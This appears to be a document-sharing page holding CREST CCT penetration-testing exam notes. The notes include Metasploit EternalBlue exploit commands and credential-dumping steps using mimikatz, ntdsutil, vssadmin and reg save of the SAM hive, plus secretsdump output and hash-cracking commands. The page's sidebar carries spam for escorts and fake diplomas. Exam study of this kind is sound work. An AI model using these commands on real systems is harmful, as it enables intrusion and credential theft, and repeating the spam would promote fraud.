Computer technicians-quick-reference-guideComputer technicians-quick-reference-guide
Computer technicians-quick-reference-guide
 
Babitha.linux
Babitha.linuxBabitha.linux
Babitha.linux
 
Babitha.linux
Babitha.linuxBabitha.linux
Babitha.linux
 

Recently uploaded

Complet Documnetation for Smart Assistant Application for Disabled Person
Complet Documnetation for Smart Assistant Application for Disabled PersonComplet Documnetation for Smart Assistant Application for Disabled Person
Complet Documnetation for Smart Assistant Application for Disabled Personfurqan222004
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作ys8omjxb
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Paul Calvano
 
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一3sw2qly1
 
Git and Github workshop GDSC MLRITM
Git and Github workshop GDSC MLRITMGit and Github workshop GDSC MLRITM
Git and Github workshop GDSC MLRITMgdsc13
 
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Sonam Pathan
 
Call Girls Service Adil Nagar 7001305949 Need escorts Service Pooja Vip
Call Girls Service Adil Nagar 7001305949 Need escorts Service Pooja VipCall Girls Service Adil Nagar 7001305949 Need escorts Service Pooja Vip
Call Girls Service Adil Nagar 7001305949 Need escorts Service Pooja VipCall Girls Lucknow
 
Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Excelmac1
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)Christopher H Felton
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一Fs
 
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Sonam Pathan
 
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一Fs
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一Fs
 
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书zdzoqco
 
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With RoomVIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Roomdivyansh0kumar0
 
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012rehmti665
 

Recently uploaded (20)

Complet Documnetation for Smart Assistant Application for Disabled Person
Complet Documnetation for Smart Assistant Application for Disabled PersonComplet Documnetation for Smart Assistant Application for Disabled Person
Complet Documnetation for Smart Assistant Application for Disabled Person
 
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Serviceyoung call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24
 
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
 
Git and Github workshop GDSC MLRITM
Git and Github workshop GDSC MLRITMGit and Github workshop GDSC MLRITM
Git and Github workshop GDSC MLRITM
 
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
 
Call Girls Service Adil Nagar 7001305949 Need escorts Service Pooja Vip
Call Girls Service Adil Nagar 7001305949 Need escorts Service Pooja VipCall Girls Service Adil Nagar 7001305949 Need escorts Service Pooja Vip
Call Girls Service Adil Nagar 7001305949 Need escorts Service Pooja Vip
 
Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
 
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
 
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170
 
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
 
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
 
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With RoomVIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
 
Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
 
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
 

CREST CCT Lab Prep Notes

  • 1. Long Question Useful  Web Server Counter Measures – p158 2nd Edition Appendix A: Soft Skills and Assessment Management A5 Record Keeping, Interim Reporting & Final Results Understanding reporting requirements. Understanding the importance of accurate and structured record keeping during the engagement. Appendix B: Core Technical Skills B4 Network Mapping & Target Identification Analysis of output from tools used to map the route between the engagement point and a number of targets. Network sweeping techniques to prioritise a target list and the potential for false negatives. B11 Cryptography Differences between encryption and encoding. Symmetric / asymmetric encryption. Encryption algorithms: DES, 3DES, AES, RSA, RC4. Hashes: SHA1 and MD5 Message Integrity codes: HMAC Appendix C: Background Information Gathering & Open Source C3 Customer Web Site Analysis Analysis of information from a target web site, both from displayed content and from within the HTML source.
  • 2. Appendix E: Microsoft Windows Security Assessment E4 Windows Passwords Password policies (complexity, lockout policies) Account Brute Forcing Hash Storage (merits of LANMAN, NTLMv1 / v2) Offline Password Analysis (rainbow tables / hash brute forcing) E5 Windows Vulnerabilities Knowledge of remote windows vulnerabilities, particularly those for which robust exploit code exists in the public domain. Video: MS17-010 – Eternal Blue msfconsole use auxiliary/scanner/smb/smb_ms17_010 show options set RHOSTS 10.10.12.107 exploit use exploit/windows/smb/ms17_010_eternalblue show options set RHOSTS 10.10.12.107 exploit Metasploit.txt Metasploit Start up and Update Example: Metasploit - Exploiting MS17-010 - Eternalblue Vulnerability Exploits search: IIS, RDP use $exploit show options | show payloads | show targets set settings ... exploit/run (for auxiliary) Auxiliary Modules show options, set RHOSTS (and other values such THREADS, VHOSTS), run Eternal Blue SMB Remote Windows Kernel Pool Corruption-MS17-010 Knowledge of local windows privilege escalation vulnerabilities and techniques. Knowledge of common post exploitation activities:  Obtain password hashes, both from the local SAM and cached credentials HASHES  Hashes on stored in the SAM database on a Windows system, or the NTDS database on the Domain Controller. 1. SAM file (need both C:windowssystem32configSAM, and C:windowssystem32configsystem) 2. Registry (HKEY_LOCAL_MACHINESecurityCache for domain credentials, HKEY_LOCAL_MACHINESAM for local credentials)
  • 3. 3. Domain Controller: C:WindowsNTDSNTDS.dit 4. In-memory (dump with mimikatz) -- however this last one isn't "stored" as in written-to-disk.  LM-hashes is the oldest password storage used by Windows, dating back to OS/2 in the 1980’s and were turned off by default starting in Windows Vista/Server 2008. it is possible to enable it in later versions through a GPO setting (even Windows 2016/10).  NTHash is often referred to as NTLM hash. The v1 of the protocol uses both the NT and LM hash, depending on configuration and what is available. NTLMv2 (different algorithm) s the default in Windows since Windows 2000. OBTAINING THE HASHES  Mimikatz has a feature (dcsync) which utilises the Directory Replication Service (DRS) to retrieve the password hashes from the NTDS.DIT file. It can be executed from any system that is part of the domain from the context of domain administrator. lsadump::dcsync /domain:pentestlab.local /all /csv  The ntdsutil is a part of the domain controller ecosystem and its purpose is to enable administrators to access and manage the windows Active Directory database. ntdsutil activate instance ntds ifm create full C:ntdsutil quit quit Two new folders will be generated: Active Directory and Registry. The NTDS.DIT file will be saved in the Active Directory and the SAM and SYSTEM files will be saved into the Registry folder.  DiskShadow is a Microsoft signed binary which is used to assist administrators with operations related to the Volume Shadow Copy Service (VSS). DiskShadow is included in Windows Server 2008, Windows Server 2012, and Windows Server 2016 and is a Windows signed binary.
  • 4.  VSSadmin – Comes with Windows servers. The volume shadow copy is a Windows command line utility which enables administrators to take backups of computers, volumes and files even if they are in use by the operating system. vssadmin list shadows - check whether any shadow copies already exist vssadmin create shadow /for=C: - create a shadow copy, then copy ntds.dit and SYSTEM copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy1WindowsSystem32configSAM C:SAM1 copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy1WindowsSystem32configSYSTEM C:SYSTEM1 NTDS may not exist if you did not dump from a DC. vssadmin delete shadows /shadow=[GUID] - delete the shadow copy (if you need to run this…) Then extract using either SamDump2 or impacket.  Can also use Cain to dump the passwords.  Registry and SamDump2 C:WINDOWSsystem32>reg save hklmsam c:sam The operation completed successfully. C:WINDOWSsystem32>reg save hklmsystem c:system The operation completed successfully. C:WINDOWSsystem32>reg save hklmsecurity c:security The operation completed successfully. The security file contains the cached credentials. Copy the files to Kali and run SamDump2 (or impacket which gives more info) root@Kali:~# samdump2 system sam *disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: *disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: *disabled* :503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: *disabled* :504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::  PWdump - PWdump7 needs to be run as admin. pwdump7 > hash.txt  Cached Credentials Having dumped the security hive from registry: C:WINDOWSsystem32>reg save hklmsecurity c:security The operation completed successfully. Then from Kali use impacket gives information of SAM and SYSTEM. The file name is sam and system. If you don’t have security you can remove it. root@Kali:~# python /usr/share/doc/python-impacket/examples/secretsdump.py -sam sam - security security -system system LOCAL
  • 5. Impacket v0.9.13 - Copyright 2002-2015 Core Security Technologies [*] Target system bootKey: 0x4e52ab9bfb9019fb6827913377943620 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:: : [*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain) [*] Dumping LSA Secrets [*] DPAPI_SYSTEM 0000 01 00 00 00 D7 C6 B0 AD 57 36 7C D6 4C 22 3A 59 ........W6|.L":Y 0010 25 9E 19 C8 3F E0 8C E7 FD C5 53 6F B4 84 2E 83 %...?.....So.... 0020 3B DB 63 C1 A5 EB FF 3A 05 89 C4 29 ;.c....:...) [*] NL$KM 0000 5E FD D7 75 81 79 FE B5 B8 09 59 CA D9 68 76 32 ^..u.y....Y..hv2 0010 B4 96 A7 B3 A6 12 66 1D D9 AE C0 ED AE D2 0C B7 ......f......... 0020 6E E7 8E 89 D2 41 BF 92 58 E6 D4 C7 04 54 89 58 n....A..X....T.X 0030 01 EA D5 75 6C 8E EE E6 8C D6 F6 AA 02 12 7A 47 ...ul.........zG [*] RasDialParams!S-1-5-21-2026301890-2774087781-1233172474-1001#0 0000 35 00 30 00 30 00 39 00 30 00 39 00 33 00 37 00 5.0.0.9.0.9.3.7. 0010 00 00 31 00 36 00 30 00 38 00 00 00 33 00 00 00 ..1.6.0.8...3... 0020 00 00 00 00 44 00 61 00 76 00 69 00 64 00 33 00 ....D.a.v.i.d.3. 0030 30 00 39 00 2D 00 56 00 50 00 4E 00 00 00 40 00 0.9.-.V.P.N...@. 0040 4A 00 61 00 70 00 61 00 6E 00 30 00 31 00 23 00 x.x.x.x.x.x.x.x. 0050 00 00 00 00 30 00 00 00 00 00 ....0..... [*] Cleaning up...  Obtain locally-stored clear-text password  Crack password hashes John the Ripper, Cain & Abel is a Windows-based tool with a host of useful features, including a password cracker. It's normally a good idea to break very weak passwords with a simple dictionary attack and short (5 character) brute force attack first, then let the Rainbow Tables pick up the rest. SHA256 Hashing: kali# echo pearson | sha256sum 901….ba13 Windows password storage does not use salt so hashed passwords would look the same. Unlike in Linux, because of use of salting, if two users have same password then they will look different. NT password hashes will be mixed case, whereas LMHash will be all uppercase. John the Ripper John comes with its own dictionary at /usr/share/john/password.lst You can edit the file to add your own passwords, or use your own list using wordlist=/usr/share/john/file.lst. In the output, the username will be on the right-hand side and cracked password on the left. The number next to the username tells you which side of the password it is cracking for LMHASH which stores if password is greater than 8 characters it splits it into two and always make password upper case. So lowercase, password would be stored as PASSWOR and D. kali# john password-hashes.txt ACME201 (fireman:2)
  • 6. The below command will show all passwords that have been cracked: kali# john –show password-hashes.txt The hidden directory in home ./john stores the output files of .log, .pot, .rec Change the format to NT cracking (default is LMHASH) kali# john password-hashes.txt –-format=nt …and then have to specify format in show command: kali# john –show password-hashes.txt –format=nt Hashcat GPU (graphics card) support, so faster and works on Windows and is able to crack a large variety of hash formats. hashcat64.exe –potfile-path cracked-passwords.txt -m 3000 password_hashes.txt -a 3 The potfile is where the cracked passwords will be stored, the -m 3000 specifies the hash format being cracked, 3000 is for LMhash and 1000 is for NT Hash, the -a specifies brute force. To view the cracked passwords: hashcat64.exe –m 3000 –potfile-path cracked_passwords.pot password_hashes.txt –show --username Can use a dictionary attack: hashcat64.exe –potfile-path cracked_passwords.pot -m 3000 password_hashes.txt D:toolshatsrockyou.txt -r D;toolhashcat-3.6.0rulesInsidePro-PasswordsPro.rule The rule specifies various mangling rules.  Check patch levels – CREST Exam Notes; WMIC: wmic qfe list full /format:htable > hotfixes.htm Powershell (enter powershell) Get-WmiObject -Class "win32_quickfixengineering" get-hotfix Linux: Debian or Ubuntu: apt-get upgrade -s | grep -i security RH: rpm -qa --last  Derive list of missing security patches -  Reversion to previous state: System Restore is a Windows feature that can help fix certain types of crashes and other computer problems.
  • 7. Appendix G: Web Technologies G2 Web Servers & their Flaws Common web servers and their fundamental differences and vulnerabilities associated with them:  IIS – P372 Network Security Assessment  Apache (and variants) – P373 Network Security Assessment G4 Web Protocols Web protocols: HTTP, HTTPS, SOAP. All HTTP web methods and response codes.  See Exam Notes - Identifying Permitted HTTP Methods, also Web App Notes for Nmap NSE and Metasploit script (p16) HTTP Header Fields relating to security features  See Web App and Exam Notes G7 Web Application Servers Vulnerabilities in common application frameworks, servers and technologies: .NET (p413), J2EE, ColdFusion (p403), Ruby on Rails (p409) and AJAX. Chapter 14, Network Security Assessment. AJAX Security - CS.html DotNet Security - CS.html Ruby on Rails - CS.html G8 Web APIs Application interfaces: CGI, ISAPI filters and Apache modules. G9 Web Sub-Components Web architecture sub-components: Thin/Thick web clients, servlets and applets, Active X. Flash Application Testing .Net Thick Clients Java Applets Decompilation of client-side code Base64 decoding? – Burp Decoder
  • 8. Appendix H: Web Testing Methodologies H3 Information Gathering from Web Mark-up Examples of the type of information available in web page source that may prove useful to an attacker:  Hidden Form Fields – Burp: Proxy > Options > Response Modification: Unhide Hidden Form Fields.  Database Connection Strings  Credentials  Developer Comments  Other included files  Authenticated-only URLs H4 Authentication Mechanisms Common pitfalls associated with the design and implementation of application authentication mechanisms.  Useful p180, 2nd Edition H5 Authorisation Mechanisms Common pitfalls associated with the design and implementation of application authorisation mechanisms. H6 Input Validation The importance of input validation as part of a defensive coding strategy. How input validation can be implemented and the differences between white listing, black listing and data sanitisation. H7 Application Fuzzing Fuzzing and its relevance within web-app penetration testing. The use of fuzz strings and their potential effects. Potential dangers of fuzzing web applications. H9 Use of Cross Site Scripting Attacks Potential implications of a cross site scripting vulnerability. Ways in which the technique can be used to benefit an attacker. H10 Use of Injection Attacks Potential implications of injection vulnerabilities:  SQL injection  LDAP injection  Code injection  XML injection Ways in which these techniques can be used to benefit an attacker.
  • 9. H11 Session Handling Common pitfalls associated with the design and implementation of session handling mechanisms. H12 Encryption Common techniques used for encrypting data in transit and data at rest, either on the client or server side. Identification and exploitation of Encoded values (e.g. Base64) and Identification and exploitation of Cryptographic values (e.g. MD5 hashes) Identification of common SSL vulnerabilities H13 Source Code Review Common techniques for identifying and reviewing deficiencies in the areas of security.  Useful table p164, 2nd Edition
  • 10. Appendix I: Web Testing Techniques I1 Web Site Structure Discovery Spidering tools and their relevance in a web application test for discovering linked content. Forced browsing techniques to discover default or unlinked content - Web Application Security Methodology and Testing: Directory and File Scanning, also Nikto  Identification of functionality within client-side code I2 Cross Site Scripting Attacks Arbitrary JavaScript execution. Using Cross Site Scripting techniques to obtain sensitive information from other users. Phishing techniques.  See XSS I3 SQL Injection Determine the existence of an SQL injection condition in a web application. Determine the existence of a blind SQL injection condition in a web application. Exploit SQL injection to enumerate the database and its structure. Exploit SQL injection to execute commands on the target server.  See SQL injection I4 Session ID Attacks Investigate session handling within a web application. Harvest and analyse a number of session identifiers for weaknesses.  See Testing Session ID and Token Strength  Useful table p167 2nd Edition I5 Fuzzing The concept of fuzzing within a web application testing methodology. Common fuzzing tools. I6 Parameter Manipulation Parameter manipulation techniques, particularly the use of client-side proxies. I7 Data Confidentiality & Integrity Identifying weak (or missing) encryption. Identifying insecure SSL configurations.
  • 11. Identify insecure use of encoding techniques I8 Directory Traversal Identifying directory traversal vulnerabilities within applications.  See RFI and LFI, Path Transversal I9 File Uploads Identifying common vulnerabilities with file upload capabilities within applications.  See Uploads. I10 Code Injection Investigate and exploitation of code injection vulnerabilities within web applications  See OS command injection – get Commix working… I11 CRLF Attacks Assessment of web applications for CRLF vulnerabilities  See HTTP Testing – Headers I12 Application Logic Flaws Assessing the logic flow within an application and the potential for subverting the logic.
  • 12. Appendix J: Databases J1 Microsoft SQL Server (p424) Knowledge of common attack vectors for Microsoft SQL Server. Understanding of privilege escalation and attack techniques for a system compromised via database connections.  See CREST exam notes J2 Oracle RDBMS (p426) Derivation of version and patch information from hosts running Oracle software. Default Oracle accounts.  See CREST exam notes J3 Web / App / Database Connectivity Common databases (MS SQL server, Oracle, MySQL and Access) and the connection and authentication methods used by web applications  See CREST exam notes Useful Nmap Scripts MS SQL ms-sql-brute.nse - Performs password guessing against Microsoft SQL Server. SQL Server 2005 and later versions include support for account lockout policies. MySQL nmap -p 3306 –script=”mysql-info” 127.0.0.1 - Connects to a MySQL server and prints information such as the protocol and version numbers, thread ID, status, capabilities, and the password salt. nmap -sV -sC <target> 3306/tcp open mysql | mysql-info: | Protocol: 10 | Version: 5.0.51a-3ubuntu5.1 | Thread ID: 7 | Capabilities flags: 40968 | Some Capabilities: ConnectWithDatabase, SupportsTransactions, Support41Auth | Status: Autocommit |_ Salt: bYytNQ/4V6IN+*3`imj mysql-enum – Performs valid-user enumeration. Server version 5.x are susceptible to an user enumeration attack due to different messages during login when using old authentication mechanism from versions 4.x and earlier. mysql-brute – Basic brute force, can be run without word list. nmap --script=mysql-brute <target> 3306/tcp open mysql | mysql-brute: | Accounts | root:root - Valid credentials
  • 13. Additional Identification of more recent SSL vulnerabilities – e.g. BEAST (page 318) ssl-enum-ciphers - This script repeatedly initiates SSLv3/TLS connections, each time trying a new cipher or compressor while recording whether a host accepts or rejects it. The end result is a list of all the cipher suites and compressors that a server accepts. nmap -sV --script ssl-enum-ciphers -p 443 <host>  POODLE - We can deduce if a server is vulnerable to poodle if it supports SSLv3 protocol and uses CBC ciphers.  BEAST - Any server supporting SSLv3 OR TLS 1.0 and uses CBC ciphers. BEAST was indeed an attack on CBC mode with predictable (in fact known) IV in SSL3 and TLS1.0, because those protocols used the last block of the previous record, which (usually) has already been sent and seen by the adversary, as the IV for the next record. POODLE is not an attack on IV at all; it is a padding oracle attack on the padding used in SSL3 (and it turned out some debatably defective TLS1.0 implementations also), hence the acronym Padding Oracle on Downgraded Legacy Encryption Examples.txt HTTP Header Fields relating to security features – e.g. HSTS  See CREST Notes: HTTP Header Fields relating to security features  Useful p172, 2nd Edition Strict-Transport-Security.html Web Server security misconfigurations – e.g. WebDAV - Page 340, 372, and p116 2nd Edition http-webdav-scan - The script sends an OPTIONS request which lists the dav type, server type, date and allowed methods. It then sends a PROPFIND request and tries to fetch exposed directories and internal ip addresses by doing pattern matching in the response body. nmap --script http-webdav-scan -p80,8080 <target> Script Output PORT STATE SERVICE 8008/tcp open http | http-webdav-scan: | Allowed Methods: GET, HEAD, COPY, MOVE, POST, PUT, PROPFIND, PROPPATCH, OPTIONS, MKCOL, DELETE, TRACE, REPORT | Server Type: DAV/0.9.8 Python/2.7.6 | Server Date: Fri, 22 May 2015 19:28:00 GMT | WebDAV type: Unknown | Directory Listing: | http://localhost | http://localhost:8008/WebDAVTest_b1tqTWeyRR | http://localhost:8008/WebDAVTest_A0QWJb7hcK | http://localhost:8008/WebDAVTest_hf9Mqqpi1M |_ http://localhost:8008/WebDAVTest_Ds5KBFywDq
  • 14. Metasploit has a few modules to test for WebDAV presence. WebDAV.txt Decompilation of client-side code – e.g. Flash, Java, .Net Flash  Flash maintains its own cookie store that allows for cookies (that can’t be deleted directly from the browser).  ActionScript is an open source scripting language that compiles into bytecode and is leveraged both in Adobe Flash and Apache Flex. The bytecode is executed within an ActionScript Virtual Machine (AVM), which provides a similar sandbox environment to Java.  Though the ActionScript-compiled bytecode is not human-readable, tools such as SWFScan24 can turn the bytecode back into ActionScript.  JPEXS Free Flash Decompiler  Perl Script – SWF-File-0.42 Java  Java code runs in two primary ways: either through standalone Java applications or through web applets. Applets are Java code specifically designed to run within a web page.  Java has a security model around the applets that tries to prevent them from calling malicious code. This model, also known as a sandbox.  A core difference between a signed applet and an unsigned applet (quarantined within the sandbox) is that a signed applet can execute code outside of the sandbox.  Actions like accessing the file system or executing operating system commands are blocked by default. The Java security model requires code to be trusted or permission to be given before accessing functionality that has security implications.  Java code is compiled into byte code resulting in a compiled class file and then proceed by the JVM.  Reversing Java using JD-GUI – page 391 .Net  JustDecompile Vulnerabilities in increasingly prevalent application frameworks – e.g. Rail (p409) Flash Application Testing Java Applets .Net Thick Clients Identification of functionality within client-side code that is accessible only to privileged users